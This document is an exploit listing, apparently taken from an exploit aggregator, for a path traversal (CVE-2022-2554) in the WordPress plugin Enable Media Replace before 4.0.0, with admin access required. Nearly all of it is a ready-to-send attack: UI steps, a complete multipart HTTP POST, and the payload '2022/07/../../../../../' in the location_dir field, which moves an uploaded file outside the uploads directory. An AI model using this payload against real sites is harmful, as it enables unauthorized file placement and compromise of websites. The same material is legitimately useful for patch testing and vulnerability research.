Exploit for Enable Media Replace < 4.0.0 - Admin+ Path Traversal CVE-2022-2554

Name: Exploit for Enable Media Replace < 4.0.0 - Admin+ Path Traversal CVE-2022-2554
Rating: 5 (193 reviews)
2022-09-14 | CVSS 0.9
## https://sploitus.com/exploit?id=WPEX-ID:5872F4BF-F423-4ACE-B8B6-D4CC4F6CA8D9
When replacing the file, select "Replace the file, use new file name and update all links" and tick "Put new Upload in Updated Folder:" then put the payload in this setting: 2022/07/../../../../../

POST /wp-admin/upload.php?page=enable-media-replace%2Fenable-media-replace.php&action=media_replace_upload&attachment_id=5882&_wpnonce=7a3549cbce&noheader=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------160389504219271480051605192775
Content-Length: 1370
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="ID"

5882
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="userfile"; filename="a.txt"
Content-Type: text/plain

Test file

-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="replace_type"

replace_and_search
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="timestamp_replace"

2
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="custom_date"

July 27, 2022
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="custom_hour"

13
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="custom_minute"

43
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="custom_date_formatted"

2022-07-27
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="new_location"

1
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="location_dir"

2022/07/../../../../../
-----------------------------160389504219271480051605192775--


The file will be moved to the parent folder of the blog